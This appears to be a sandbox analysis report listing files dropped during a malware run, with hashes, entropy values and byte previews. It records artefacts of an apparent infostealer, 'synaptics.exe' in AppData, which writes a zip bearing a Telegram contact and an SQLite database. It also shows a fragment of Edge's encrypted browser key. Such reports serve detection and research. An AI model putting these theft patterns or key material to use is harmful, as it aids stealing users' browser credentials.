                                                                                                                                                                                                            Preview:...._+jE.`..}....S..1....G}s..E....y".Wh.^.W.H...-...#.A...KR...9b........>k......bU.IVo...D......Y..[l.yx.......'c=..I0.....E.d...-...1 ....m../C...OQ.........qW..<:N.....38.u..X-..s....<..U.,Mi..._.......`.Y/.........^..,.E..........j@..G8..N.... ..Ea...4.+.79k.!T.-5W..!..@+..!.P..LDG.....V."....L.... .(#..$..&......C.....%A.T}....K_.S..'Q.".d....s....(j.D!......Ov..)*d0)."(..%..-..G..L.}....i.....m9;.....t.w..0....f?..-..M.c.3.....N7K.T..D>.3.x...z..u$5!..4..T.....U.O^L{.5..=E..'..;.}(|.6.:..f!.>...?M.8......P.D.J.I4.<...*.y.E....>....i%.6..Y.@..n.....M..r..C.f.;..<..0.H...F....h.......HB1]1....u..:...H..k....B.Q..J...@}j~.#...'Y.J~....I...ub.&..L[z..1.W/.Ck....M.......[.......N.F..z*.{nZ~d.V.4.u.K.V.......X.<p..cz..>*....X...W..da3(..g..Z$.L4.j=~.p.l.\.[e.&&.Y ...U)..._.^r0.,.{_......`S..[....(.\..p.bt.g..%.$+....f.....d....Im..f...W ......G..i_8a..ae..7....pS.....z-H..A.s.4.3..O.r.....u.S......a.}..v.-/..... ...a.x#./:...sS&U.().xL...pg
                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):87
                                                                                                                                                                                                            Entropy (8bit):4.415446034314543
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:YQ3JYq9xSs0dMEJAELJ2rjozQd:YQ3Kq9X0dMgAEwjj
                                                                                                                                                                                                            MD5:3FA87FFDBFD627F217A5F052D6D3A7AC
                                                                                                                                                                                                            SHA1:0746F46DE416E30212C78E240BF6B5352EE2EF9C
                                                                                                                                                                                                            SHA-256:7C782809649AE44D26AD9EC63F900A8B306E91ED01410EEDD6A9AB778770ED2B
                                                                                                                                                                                                            SHA-512:EDAEDD2E75B29829BE86D25CB0D894832FCA323FD12493133E9230007D3FA353F12F3DBC87DAD9FE2B86D0F26EC3814C9951975ADFF3421623C44642AA780894
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:{"user_experience_metrics.stability.exited_cleanly":false,"variations_crash_streak":14}
                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):6820
                                                                                                                                                                                                            Entropy (8bit):5.794617719539494
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:iaqkHfxdYZ5ih/cI9URLl8RotohMFVvlwhHe4IbONIeTC6XQS0qGqk+Z4uj+rjEy:akZymeiRUeh56qRAq1k8SPxVLZ7VTiq
                                                                                                                                                                                                            MD5:F592E7A06122C6CB7B476348A8CA904A
                                                                                                                                                                                                            SHA1:F331295354250EE23851CF8CCDFBB9C366F0376C
                                                                                                                                                                                                            SHA-256:339BDFF795D2B00B43B742C1ECEF48E1D64C39C0E7EDA975634E70AB9E8FA3CF
                                                                                                                                                                                                            SHA-512:FA7716B97D70B7A9370AFF992F14C4DAE03808E95A0AD7641853D6AC5DC3EE9878B5CA4E951DDBC74BCA627AE661667CBC19AB18F2A84B10E4CCB73C8D96D3C4
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:{"browser":{"last_redirect_origin":""},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false}},"fire_local_softlanding_notification":false,"fre":{"soft_landing_bubble":{"bubble_response":0,"has_user_seen_bubble":true,"is_bubble_triggered":0}},"hardware_acceleration_mode_previous":true,"legacy":{"profile":{"name":{"migrated":true}}},"migration":{"last_edgeuwp_pin_migration_on_edge_version":"92.0.902.67","last_edgeuwp_pin_migration_on_os_version":"10 OS Version 2009 (Build 19045.2006)","last_edgeuwp_pin_migration_success":false},"os_crypt":{"audit_enabled":true,"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAABGb6U6oS03TLmZvvwWLF4cEAAAAB4AAABNAGkAYwByAG8AcwBvAGYAdAAgAEUAZABnAGUAAAAQZgAAAAEAACAAAABqHLT+7OmIhzwQT+obLl8YwOVJW1rOSudUR0lJbJJRCwAAAAA
                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):8401
                                                                                                                                                                                                            Entropy (8bit):5.790149948860984
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:fsNwZyeeiRUEVQCkVSkf6qRAq1k8SPxVLZ7VTiQ:fsNwsE5qBVb6q3QxVNZTiQ
                                                                                                                                                                                                            MD5:9B44A60F1E0DFDF5FF61158D2A6E0FF2
                                                                                                                                                                                                            SHA1:0DD3BBF9D5BB22D826D7BC0D4DCC96744CFEE087
                                                                                                                                                                                                            SHA-256:C061C58811BF34C46108256829AB60DA12D9DF739D3B33DFC9A1A43E5D2E0354
                                                                                                                                                                                                            SHA-512:7DCA7683B1011F9B0940F1CA9134CEB32912B678E95AF79C6EF0911105DF5DA7BD0CCC3CBC95F1172479F5ACE4E50534E9FCBFDE1EDAE59471EB062B1008F0F8
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:{"browser":{"last_redirect_origin":""},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"dual_engine":{"ie_to_edge":{"redirection_mode":0}},"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false},"tab_stabs":{"closed_without_unfreeze_never_unfrozen":0,"closed_without_unfreeze_previously_unfrozen":0,"discard_without_unfreeze_never_unfrozen":0,"discard_without_unfreeze_previously_unfrozen":0},"tab_stats":{"frozen_daily":0,"unfrozen_daily":0}},"fire_local_softlanding_notification":false,"fre":{"oem_bookmarks_set":true,"soft_landing_bubble":{"bubble_response":0,"has_user_seen_bubble":true,"is_bubble_triggered":0}},"hardware_acceleration_mode_previous":true,"legacy":{"profile":{"name":{"migrated":true}}},"migration":{"last_edgeuwp_pin_migration_on_edge_version":"92.0.902.67","last_edgeuwp_pin_migration
                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):2278
                                                                                                                                                                                                            Entropy (8bit):3.8500865578485097
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:uiTrlKxrgx4Jxl9Il8uxgtpGbbblmVliRWKzd1rc:m5Yw7GhmVkWKU
                                                                                                                                                                                                            MD5:D16B32C21043DCF0CC1091FB84A2A9F6
                                                                                                                                                                                                            SHA1:A3DF26F7132D4217830413DC6A632DE027EFAD5F
                                                                                                                                                                                                            SHA-256:0B411CC2CA1CCEC4A5DD2AB1B2DE2EA24FFF8E60C471CD82864051E64EB51EED
                                                                                                                                                                                                            SHA-512:D8DC5B083D3F65FD261F33861F1E0035E90329495A3F3A66A3948951C8CB2FA4D6A6AC06846160506C9A887689FA8C525571A07968180593F314E4ED1FBB41F1
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".W.i.p.w.W.M.+.N.H.l.b.C.D.m.s.Z.p.8.S.O.s.j.h.t.F.B.s.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.A.s.E.v.s.8.1.2.w.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.A.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.R.m.+.l.O.q.
                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):2684
                                                                                                                                                                                                            Entropy (8bit):3.902130120217717
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:uiTrlKx68Wa7xFxl9Il8uGA7TTKN+KKZ4HH+ckqYJoQU2epd/vc:aLYQA7TGMxZ4y9JlU2N
                                                                                                                                                                                                            MD5:5D0E8D8791EE4EADB2D35AC0F3D3BEC8
                                                                                                                                                                                                            SHA1:22055F0273C6598A67DD0F46C4B49B1E1420F136
                                                                                                                                                                                                            SHA-256:3580970B7D0B0282F497F0859322F658E1F47A964CA8EFE01343A8B74FDFD83B
                                                                                                                                                                                                            SHA-512:2CC67BA3804E35CC4317A29420B8C8110653BFD2FA39C9C8B91665E70C11A608EE98B840C98C0B5B4043BA7BF24C42090FB9F2C1F27235A65463127E8DC3CDD4
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".6.N.3.U.y.9.n.A.U.E.q.s.5.u.9.6.E./.o.g.0.E./.V.J.A.g.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".y.7.Y.g.1.Z.h.U.3.A.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.A.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.R.m.+.l.O.q.
                                                                                                                                                                                                            Process:C:\Windows\System32\mshta.exe
                                                                                                                                                                                                            File Type:HTML document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):3249
                                                                                                                                                                                                            Entropy (8bit):5.4598794938059125
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:vKFrZ/kxjqD9zqp36wxVJddFAdd5Ydddopdyddv+dd865FhlleXckVDuca:CGpv+GkduSDl6LRa
                                                                                                                                                                                                            MD5:939A9FBD880F8B22D4CDD65B7324C6DB
                                                                                                                                                                                                            SHA1:62167D495B0993DD0396056B814ABAE415A996EE
                                                                                                                                                                                                            SHA-256:156E7226C757414F8FD450E28E19D0A404FDBA2571425B203FDC9C185CF7FF0E
                                                                                                                                                                                                            SHA-512:91428FFA2A79F3D05EBDB19ED7F6490A4CEE788DF709AB32E2CDC06AEC948CDCCCDAEBF12555BE4AD315234D30F44C477823A2592258E12D77091FA01308197B
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:...<HTML id=dlgError STYLE="font-family: ms sans serif; font-size: 8pt;..width: 41.4em; height: 24em">..<HEAD>..<meta http-equiv="Content-Type" content="text/html; charset=utf-8">..<META HTTP-EQUIV="MSThemeCompatible" CONTENT="Yes">..<TITLE id=dialogTitle>..Script Error..</TITLE>..<SCRIPT>..var L_Dialog_ErrorMessage = "An error has occurred in this dialogue.";..var L_ErrorNumber_Text = "Error: ";..var L_ContinueScript_Message = "Do you want to debug the current page?";..var L_AffirmativeKeyCodeLowerCase_Number = 121;..var L_AffirmativeKeyCodeUpperCase_Number = 89;..var L_NegativeKeyCodeLowerCase_Number = 110;..var L_NegativeKeyCodeUpperCase_Number = 78;..</SCRIPT>..<SCRIPT LANGUAGE="JavaScript" src="error.js" defer></SCRIPT>..</HEAD>..<BODY ID=bdy onLoad="loadBdy()" style="font-family: 'ms sans serif';..font-size: 8pt; background: threedface; color: windowtext;" topmargin=0>..<CENTER id=ctrErrorMessage>..<table id=tbl1 cellPadding=3 cellspacing=3 border=0..style="background: buttonfa
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):11887
                                                                                                                                                                                                            Entropy (8bit):4.901437212034066
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:3Vsm5eml2ib4LxoeRm3YrKkzYFQ9smKp56VFn3eGOVpN6K3bkkjo5MiMDOmEN3Hf:3Cib4PYb4VoGIpN6KQkj2MiQ0HzAFlif
                                                                                                                                                                                                            MD5:FF6D965CDEB3AC9F65189C31145AE902
                                                                                                                                                                                                            SHA1:746F6F92BFB914B5FC3FA54C78F06FECDC982168
                                                                                                                                                                                                            SHA-256:628F4C45D869597D75EB86B05EF2D6EB124F28D7421B14C4D07E068282310277
                                                                                                                                                                                                            SHA-512:0F846FE13380F2D83DA0F550505AAC7C1531CE395817A807F20BD04CB2CD9B58845A0E260E9F634088FF3E074939BDF55A98712B372AE0ED3AE46BC69D2205B8
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:PSMODULECACHE.....$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module........Find-Command........Unregister-PSRepository........Get-InstalledScript........Get-DynamicOptions........Add-PackageSource........Register-PSRepository........Find-DscResource........Publish-Script........Find-RoleCapability........Uninstall-Package........Get-PackageDependencies........pumo........fimo........Find-Script........Initialize-Provider........Get-PackageProviderName........Test-ScriptFileInfo........Get-InstalledModule........Update-ScriptFileInfo........Get-InstalledPackage........Resolve-PackageSource........Uninstall-Module........inmo........Remove-PackageSource........Update-Script........Uninstall-Script........Update-ModuleManifest........Get-Feature........Install-Module........Install-Package........New-ScriptFileInfo...
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):2916
                                                                                                                                                                                                            Entropy (8bit):5.35714670261737
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:4TqAzsSU4MmT5ajm9qr9tz4RIoUQ/78NfpH0Gx3axIZVEouNHJBVrH/jCB:tAzlHJTF9qrfIfl7KfpljPEo2dL8
                                                                                                                                                                                                            MD5:3B4377DE9DA1FEA037DC740D8ACBBC57
                                                                                                                                                                                                            SHA1:ED7EF1F6525EB60A2470774F9907BFB3005971E2
                                                                                                                                                                                                            SHA-256:751681754B5B9200780DB900C2BAAA6769E5ACE130A26CE7A6B6ABB7D5C261DB
                                                                                                                                                                                                            SHA-512:76369CFBA8C147A9B2F84179F8ACA7BD1FBD41A44C06F50E1619A0C763AE847C7AA42040365A8AEFEDA33C58FF08D38A7399BDD5C029542D8EC81261BC2CF425
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:@...e...........................................................H..............@-....f.J.|.7h8..-.......Microsoft.Powershell.PSReadline.H...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation4.................%...K... ...........System.Xml..<...............i..VdqF...|...........System.Configuration4.................0..~.J.R...L........System.Data.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServicesH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<................$@...J....M+.B........System.Transactions.L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.8.................C}...C....n..Bi.......Microsoft.CSharpP...............
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:Zip archive data (empty)
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):85
                                                                                                                                                                                                            Entropy (8bit):4.60495348068845
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:pjt/l8rgzpxzkQemQi4NRzY7n:NtKgzpxznQRNR0b
                                                                                                                                                                                                            MD5:6382AECE727D382C805C58CD35664B2D
                                                                                                                                                                                                            SHA1:F004E80F17E6E05770A8306BC113773A7EFAC8C4
                                                                                                                                                                                                            SHA-256:2F49AB4AF86F9534EBCB72AA41B20E4E6564D6B0F1FEC7BCA912C8B1C0567FB9
                                                                                                                                                                                                            SHA-512:C6967E28760023F054D2D85187596F11F8503743E918029769D533D1FBD3D53E55FE96BFA371B3186BAB5F03E0D31335A0FD482E456C2B3793DC9EBB9AB424CD
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:PK..................?.Time Created: 13-11-2024 (07:26:52).Contact: https://t.me/Xmeta
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 4, database pages 87, cookie 0x66, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):180224
                                                                                                                                                                                                            Entropy (8bit):0.9312584730793054
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:CSqzyMUfTfnGCTjHbRJkkqtXaWTK+hGgH+6e7E:CrzyffrnzkkqtXnTK+hNH+5
                                                                                                                                                                                                            MD5:4ECC14F9549C4BB53159212C5BCC9CC0
                                                                                                                                                                                                            SHA1:EFEABE631F20B60E2863952BFF0F485BEB74CE36
                                                                                                                                                                                                            SHA-256:49F613160AD871F1B44381BB8F6B4E1EB481E41A86B462D4CD29CB90095EE149
                                                                                                                                                                                                            SHA-512:6EB988D5F9AA19A26EB1AE4E87F1D2E03D407B969777AB38E2031B3556D8915CCBD4BE6BD537A1A1D22A365D58CDF63E3B790D8AB7281DCCAC09F9685A0788C7
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:SQLite format 3......@ .......W...........f......................................................j............O........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
